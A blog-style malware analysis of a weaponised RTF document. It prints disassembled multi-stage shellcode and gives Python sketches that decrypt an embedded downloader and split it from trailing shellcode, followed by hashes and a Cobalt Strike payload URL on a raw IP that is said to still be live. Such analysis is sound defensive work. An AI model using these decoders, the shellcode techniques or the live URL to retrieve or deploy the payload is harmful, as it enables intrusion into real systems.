Quick Sunday morning blog post: an analysis of an unknown RTF file. This article is the result of an initial investigation. No attribution is attempted, but you’ll have all the necessary info for a deeper one.
The malicious document has SHA256: 5D9E1F4DAB6929BC699BA7E5C4FD09F2BBFD6B59D04CEFD8F4BF06710E684A5E.
After a first glance I thought I knew what was behind the rtf, but after running a specific script I was disappointed by the result. For a quick response, a submission to a sandbox could be the best option you have, but you’ll miss all the fun! I decided to check manually using a hex editor, because it’s incredible how quickly you can extract objects that way.
The personal script I tried at the beginning failed to parse the objects extracted from the document. Too bad, but at least now I know that there are embedded objects inside the file. The first thing to do is to understand why one or more objects are not correct.
What to look for? Well, I always start by checking for known objects, shellcode and things like that.
“465753” (which stands for ‘FWS’, a standard part of the flash file header) is a nice string to put inside the search text box.
![image_1](https://cdn.statically.io/img/zairon.wordpress.com/wp-content/uploads/2017/02/image_1.png?w=627)
Flash object identification
It seems the document contains a Flash object. The Flash file header also tells you the size of the object; the red box in the picture reveals it: 0x50A1 bytes.
Cut it from the file and paste to a new file (remember to copy as text and paste as hex text).
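The same cut-and-paste can be scripted. Below is a minimal Python sketch, not the script mentioned earlier: the function name `carve_swf_from_hex_text` is made up for illustration. It assumes the object data is plain ASCII hex with no RTF control words inside the Flash object, and that the first "465753" hit really is the start of the object. The layout it relies on is the uncompressed SWF header: 3 signature bytes, 1 version byte, then a 4-byte little-endian file length.

```python
import re


def carve_swf_from_hex_text(rtf_text: str) -> bytes:
    """Carve an uncompressed Flash object out of hex-encoded RTF object data."""
    # Drop whitespace so line breaks inside the hex dump do not split the object.
    compact = re.sub(r"\s+", "", rtf_text)
    # "FWS" shows up as the text "465753" because the data is hex-encoded.
    start = compact.lower().find("465753")
    if start < 0:
        raise ValueError("no FWS signature found")
    # Header: signature (3 bytes), version (1 byte), file length (4 bytes, LE).
    header = bytes.fromhex(compact[start:start + 16])
    length = int.from_bytes(header[4:8], "little")
    # Two hex characters per byte.
    return bytes.fromhex(compact[start:start + 2 * length])
```

For the sample described here, the length field would be the 0x50A1 shown in the red box. If the hex run is interrupted by anything other than whitespace, `bytes.fromhex` raises and a manual look is still needed.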
![image_2](https://cdn.statically.io/img/zairon.wordpress.com/wp-content/uploads/2017/02/image_2.png?w=627)
Flash object details
Loading the new file into the JPEXS Flash decompiler doesn’t help much. As you can see, there’s no code inside; the only suspicious thing is the binary data.
Not knowing what’s behind that sequence of bytes, I decided to go back to the hex editor. A closer look at the Flash contents reveals a weird sequence of bytes:
![image_3](https://cdn.statically.io/img/zairon.wordpress.com/wp-content/uploads/2017/02/image_3.png?w=627)
Extra bytes start
![image_4](https://cdn.statically.io/img/zairon.wordpress.com/wp-content/uploads/2017/02/image_4.png?w=627)
Extra bytes end
It seems the attacker has modified the Flash file by inserting some extra bytes into it. What do these bytes mean? Is it shellcode? Answering this question is pretty easy, just look at it:

    010000  4A                 DEC EDX
    010001  4B                 DEC EBX
    010002  4A                 DEC EDX
    010003  4E                 DEC ESI
    010004  43                 INC EBX
    ...
    010055  4B                 DEC EBX
    010056  4A                 DEC EDX
    010057  4B                 DEC EBX
    010058  4A                 DEC EDX
    010059  4A                 DEC EDX
    01005A  42                 INC EDX
    01005B  D9 EE              FLDZ
    01005D  D9 74 24 F4        FSTENV (28-BYTE) PTR SS:[ESP-C]
    010061  5F                 POP EDI  ; EDI = 0x1005B, address of the last FPU instruction (FLDZ)
    010062  83 C7 2B           ADD EDI,2B  ; EDI = 0x10086, first byte to decrypt
    010065  BA 8A FE FF FF     MOV EDX,-176
    01006A  F7 DA              NEG EDX  ; EDX = 0x176, number of bytes to decrypt
    01006C  31 F6              XOR ESI,ESI
    01006E  B4 4C              MOV AH,4C  ; xor key
    010070  8A 07              MOV AL,BYTE PTR DS:[EDI]  ; get current byte
    010072  30 E0              XOR AL,AH  ; xor decryption
    010074  A8 01              TEST AL,1
    010076  75 04              JNZ SHORT 0001007C
    010078  FE C0              INC AL
    01007A  EB 02              JMP SHORT 0001007E
    01007C  FE C8              DEC AL
    01007E  88 07              MOV BYTE PTR DS:[EDI],AL  ; save the decrypted byte
    010080  46                 INC ESI
    010081  47                 INC EDI
    010082  39 D6              CMP ESI,EDX
    010084  75 EA              JNZ SHORT 00010070

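The loop at 0x10070 is easy to reproduce offline. Here is a minimal Python sketch of it; the function name `decode_stage1` is mine, and the input is assumed to be the 0x176 bytes that start at 0x10086.

```python
def decode_stage1(blob: bytes, key: int = 0x4C) -> bytes:
    """Emulate the decoder loop: XOR with the key, then flip the lowest bit."""
    out = bytearray()
    for b in blob:
        b ^= key                  # XOR AL,AH
        if b & 1:                 # TEST AL,1 / JNZ
            b = (b - 1) & 0xFF    # DEC AL (odd value: clears bit 0)
        else:
            b = (b + 1) & 0xFF    # INC AL (even value: sets bit 0)
        out.append(b)
    return bytes(out)
```

The INC/DEC pair always flips bit 0, so the whole loop is the same as a single XOR with 0x4D. As a quick check, feeding it the bytes 7C 84 returns 31 C9, the opcode bytes of the first decrypted instruction in the next listing (the encrypted pair is derived from the key, not read from the sample).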
The first part of the shellcode is a simple xor decryption loop; the real shellcode starts once decryption is done. Here is the second part of the shellcode:

    010086  31 C9              XOR ECX,ECX
    010088  64 8B 71 30        MOV ESI,DWORD PTR FS:[ECX+30]  ; PEB base address
    01008C  8B 76 0C           MOV ESI,DWORD PTR DS:[ESI+C]  ; pointer to PEB_LDR_DATA
    01008F  8B 76 1C           MOV ESI,DWORD PTR DS:[ESI+1C]  ; InInitializationOrderModuleList
    010092  8B 6E 08           MOV EBP,DWORD PTR DS:[ESI+8]  ; base address of the current element
    010095  8B 46 20           MOV EAX,DWORD PTR DS:[ESI+20]  ; name of the current element
    010098  8B 36              MOV ESI,DWORD PTR DS:[ESI]  ; next item
    01009A  66 39 48 18        CMP WORD PTR DS:[EAX+18],CX  ; right dll check based on dll name length
    01009E  75 F2              JNZ SHORT 00010092  ; loop until "kernel32.dll" is found
    0100A0  8B 45 3C           MOV EAX,DWORD PTR SS:[EBP+3C]  ; PE offset
    0100A3  8B 54 05 78        MOV EDX,DWORD PTR SS:[EBP+EAX+78]  ; Export table offset
    0100A7  01 EA              ADD EDX,EBP
    0100A9  8B 72 20           MOV ESI,DWORD PTR DS:[EDX+20]
    0100AC  01 EE              ADD ESI,EBP
    0100AE  31 C9              XOR ECX,ECX
    0100B0  41                 INC ECX
    0100B1  AD                 LODS DWORD PTR DS:[ESI]
    0100B2  01 E8              ADD EAX,EBP  ; offset of the current export name
    0100B4  8B 18              MOV EBX,DWORD PTR DS:[EAX]
    0100B6  2B 58 04           SUB EBX,DWORD PTR DS:[EAX+4]
    0100B9  81 FB E5 20 DD FF  CMP EBX,FFDD20E5  ; search IsBadReadPtr export
    0100BF  75 EF              JNZ SHORT 000100B0  ; checksum algo over export name
    0100C1  49                 DEC ECX
    0100C2  8B 5A 24           MOV EBX,DWORD PTR DS:[EDX+24]
    0100C5  01 EB              ADD EBX,EBP
    0100C7  66 8B 0C 4B        MOV CX,WORD PTR DS:[EBX+ECX*2]
    0100CB  8B 5A 1C           MOV EBX,DWORD PTR DS:[EDX+1C]
    0100CE  01 EB              ADD EBX,EBP
    0100D0  03 2C 8B           ADD EBP,DWORD PTR DS:[EBX+ECX*4]
    0100D3  55                 PUSH EBP
    0100D4  55                 PUSH EBP
    0100D5  31 DB              XOR EBX,EBX
    0100D7  66 81 CB FF 0F     OR BX,0FFF
    0100DC  43                 INC EBX
    0100DD  6A 08              PUSH 8
    0100DF  53                 PUSH EBX
    0100E0  8B 44 24 08        MOV EAX,DWORD PTR SS:[ESP+8]
    0100E4  FF D0              CALL EAX  ; IsBadReadPtr
    0100E6  85 C0              TEST EAX,EAX
    0100E8  75 ED              JNZ SHORT 000100D7

The shellcode first locates the IsBadReadPtr function. After that, there’s a loop that searches for memory the calling process can read. Basically, the snippet is used to locate memory owned by the Word application.
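The export lookup does not compare strings. It subtracts the second dword of the export name from the first and compares the result with 0xFFDD20E5. Here is a small Python sketch of that check; the helper name `name_check` is mine, and the zero padding for names shorter than 8 bytes is an assumption of the sketch, not something the shellcode does.

```python
import struct

TARGET = 0xFFDD20E5  # constant compared against EBX at 0x100B9


def name_check(export_name: bytes) -> int:
    """First dword of the name minus the second dword, modulo 2**32."""
    padded = export_name.ljust(8, b"\x00")           # sketch-only padding
    first, second = struct.unpack_from("<II", padded)
    return (first - second) & 0xFFFFFFFF


print(hex(name_check(b"IsBadReadPtr")))
```

Only the first eight characters ("IsBadRea") take part in the check, which is enough to pick out IsBadReadPtr while walking the kernel32 export names.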

    0100EA  B8 51 51 68 68     MOV EAX,68685151
    0100EF  89 DF              MOV EDI,EBX
    0100F1  AF                 SCAS DWORD PTR ES:[EDI]  ; 1st search
    0100F2  75 E8              JNZ SHORT 000100DC
    0100F4  AF                 SCAS DWORD PTR ES:[EDI]  ; 2nd search
    0100F5  75 E5              JNZ SHORT 000100DC
    0100F7  81 3F 95 95 E8 E8  CMP DWORD PTR DS:[EDI],E8E89595  ; 3rd search
    ...
    010107  B9 02 8D 01 00     MOV ECX,18D02
    01010C  B8 C5 9D 1C 81     MOV EAX,811C9DC5
    010111  BF 93 01 00 01     MOV EDI,1000193
    010116  F7 E7              MUL EDI
    010118  32 06              XOR AL,BYTE PTR DS:[ESI]
    01011A  46                 INC ESI
    01011B  E2 F9              LOOPD SHORT 00010116
    01011D  5B                 POP EBX
    01011E  5F                 POP EDI
    01011F  5E                 POP ESI
    010120  3D 17 77 F9 7E     CMP EAX,7EF97717  ; right checksum over the 0x18D02 bytes
    010125  75 B0              JNZ SHORT 000100D7  ; jump if it's not the right memory space

The code searches for the byte sequence “51 51 68 68 51 51 68 68 95 95 E8 E8” in the memory validated by IsBadReadPtr. The sequence is located at the very beginning of the rtf file, which means the code is used to identify the memory region containing the loaded rtf document.
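Both checks are easy to replay on a memory dump or on the raw document. The constants 0x811C9DC5 and 0x01000193 are the standard 32-bit FNV offset basis and prime, and the multiply-then-XOR order matches FNV-1 rather than FNV-1a. Below is a minimal Python sketch with names of my own choosing. Where exactly the hashed region starts is not visible in the excerpt above, so that is left to the caller. Since 0x18D02 is 0x18CF6 + 12, it presumably covers the marker plus the encrypted block, but that is a guess.

```python
MARKER = bytes.fromhex("51516868" "51516868" "9595E8E8")
FNV_OFFSET_BASIS = 0x811C9DC5
FNV_PRIME = 0x01000193
EXPECTED = 0x7EF97717  # value the shellcode compares against at 0x10120


def fnv1_32(data: bytes) -> int:
    """32-bit FNV-1: multiply by the prime first, then XOR in the byte."""
    h = FNV_OFFSET_BASIS
    for b in data:
        h = (h * FNV_PRIME) & 0xFFFFFFFF   # MUL EDI (low 32 bits stay in EAX)
        h ^= b                             # XOR AL,BYTE PTR DS:[ESI]
    return h


def find_marker(buf: bytes) -> int:
    """Offset of the 12-byte marker in buf, or -1 if it is absent."""
    return buf.find(MARKER)
```

With the right start offset, `fnv1_32(region[:0x18D02]) == EXPECTED` should hold for the real document.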

    010127  83 C7 04           ADD EDI,4  ; skip the 12 bytes used to identify the right portion of memory
    01012A  59                 POP ECX
    01012B  57                 PUSH EDI  ; edi -> 85 95 46 00 DE 00 00 00 E0 ...
    01012C  31 C9              XOR ECX,ECX
    01012E  B6 C1              MOV DH,0C1  ; initial key
    010130  BE F6 8C 01 00     MOV ESI,18CF6  ; number of bytes to decrypt
    010135  8A 17              MOV DL,BYTE PTR DS:[EDI]
    010137  80 FA 00           CMP DL,0
    01013A  74 09              JE SHORT 00010145  ; zero bytes are left untouched
    01013C  80 C6 07           ADD DH,7  ; update the key
    01013F  38 F2              CMP DL,DH
    010141  74 02              JE SHORT 00010145  ; bytes equal to the key are left untouched
    010143  30 F2              XOR DL,DH  ; decrypt byte
    010145  88 17              MOV BYTE PTR DS:[EDI],DL  ; save decrypted byte
    010147  41                 INC ECX
    010148  47                 INC EDI
    010149  39 F1              CMP ECX,ESI
    01014B  75 E8              JNZ SHORT 00010135

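The routine above is a rolling XOR with two exceptions, and it can be replayed in a few lines of Python. This is a sketch under the assumption that the input starts right after the 12-byte marker; the function name `decrypt_blob` is mine.

```python
def decrypt_blob(data: bytes, key: int = 0xC1, step: int = 7) -> bytes:
    """Rolling XOR: the key grows by `step` for every non-zero input byte."""
    out = bytearray()
    for b in data:
        if b != 0:                      # CMP DL,0 / JE: zero bytes pass through
            key = (key + step) & 0xFF   # ADD DH,7
            if b != key:                # CMP DL,DH / JE: byte equal to key passes through
                b ^= key                # XOR DL,DH
        out.append(b)
    return bytes(out)


sample = bytes.fromhex("85954600DE000000E0")  # bytes from the listing comment
print(decrypt_blob(sample).hex(" "))  # → 4d 5a 90 00 03 00 00 00 04
```

The nine bytes shown in the listing comment decrypt to the familiar `MZ` start of a PE header. Because zero bytes and bytes equal to the current key are skipped, running the routine twice gives back the original data, so the same function also works as the encryptor.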
Another decryption routine, the decrypted area contains a PE file. Too bad the 0x18CF6 decrypted bytes are not the real payload. The next part of the shellcode helps me to identify the real payload:

    0001017F  FF D0              CALL EAX  ; HeapCreate
    00010181  05 00 10 00 00     ADD EAX,1000
    00010186  50                 PUSH EAX
    00010187  FF 74 24 04        PUSH DWORD PTR SS:[ESP+4]  ; 1st byte of the decrypted PE
    0001018B  31 C9              XOR ECX,ECX
    0001018D  C7 00 00 00 00 00  MOV DWORD PTR DS:[EAX],0
    00010193  83 C1 04           ADD ECX,4
    00010196  83 C0 04           ADD EAX,4
    00010199  81 F9 00 90 03 00  CMP ECX,39000
    0001019F  75 EC              JNZ SHORT 0001018D  ; loop used to clean the allocated memory space
    000101A1  5E                 POP ESI
    000101A2  5F                 POP EDI
    000101A3  B9 F6 12 00 00     MOV ECX,12F6  ; number of bytes to move: 0x12F6
    000101A8  56                 PUSH ESI
    000101A9  81 C6 00 7A 01 00  ADD ESI,17A00  ; move starting from 0x17A00 offset
    000101AF  57                 PUSH EDI
    000101B0  F3 A4              REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
    000101B2  C3                 RETN  ; jump to the 1st moved byte

Nice, now I can say what the payload really is. The last part of the decrypted block of bytes (len 0x12F6) represents another part of the shellcode. So, if you remove the last 0x12F6 bytes from the decrypted PE file you’ll get the real payload!
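The numbers line up nicely: 0x17A00 + 0x12F6 = 0x18CF6, so the decrypted block is exactly the payload followed by the trailing shellcode. Here is a minimal Python sketch of the split, assuming you already have the 0x18CF6 decrypted bytes in hand; the function name `split_decrypted` is mine.

```python
import hashlib

DECRYPTED_LEN = 0x18CF6   # bytes handled by the decryption loop
TAIL_OFFSET = 0x17A00     # offset added to ESI before the copy
TAIL_LEN = 0x12F6         # bytes copied by REP MOVS


def split_decrypted(blob: bytes):
    """Return (payload, trailing shellcode, SHA256 hex digest of the payload)."""
    if len(blob) < DECRYPTED_LEN:
        raise ValueError("decrypted block is shorter than expected")
    payload = blob[:TAIL_OFFSET]
    tail = blob[TAIL_OFFSET:TAIL_OFFSET + TAIL_LEN]
    return payload, tail, hashlib.sha256(payload).hexdigest()
```

On the real sample the returned digest can be compared with the extracted payload hash given below.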
Basically the last part of the shellcode is used to perform two distinct actions:
– execute the real payload
– run the Word application, passing a fake Word document as a parameter. The fake document is created inside the last part of the shellcode. Using a fake document is a standard trick: the actors try to fool the victim by hiding their real intentions.
Extracted payload SHA256 is 4c72df74a1e8039c94b188f1c5c59f30ddcc7107647689e4d908e55d04ff8b52. This new file is a downloader used to get the final stage, the real dangerous part of the entire scheme: Cobalt Strike.
To sum up:
RTF file: 5d9e1f4dab6929bc699ba7e5c4fd09f2bbfd6b59d04cefd8f4bf06710e684a5e
Extracted payload: 4c72df74a1e8039c94b188f1c5c59f30ddcc7107647689e4d908e55d04ff8b52
Cobalt Strike artifact URL: https://193.238.152.198/OeeC
Cobalt Strike artifact: 2fa6ec644b0a05c0cbe7ebaf4cc4905281e65764e91ed299d5cb3f54ab4943bf
(Beware: at the time of writing everything is still up.)
Possible related rtf files:
7a63fc5253deb672036e018750fd40dc3e8502f3b07ef225e7e6bc1144d1d7ee
08c9bd7b7b8361c5d217570019ff012773407337c9083910f2ae3a09b5401345
8e27a641684da744a0882d3664cf84d5a88b8e82ac0070d3602af0b7c103eeeb
9c7208c5c0d431738c8682cf6a2bd81df66977cbabffa0570f9d70518bece912
21dda5c82e5aa5c8545b96dc2d6d63e6786fea73453f5acaa571fd5c0466363d
af178ff11088ff59640f74191785adf134aee296652080f397cf282db36fad46
cb743f5057c77069a10ecd9e6b4fd48be096b1502e9fb3548e8a742e284eeae2
Lunch is ready, byebye!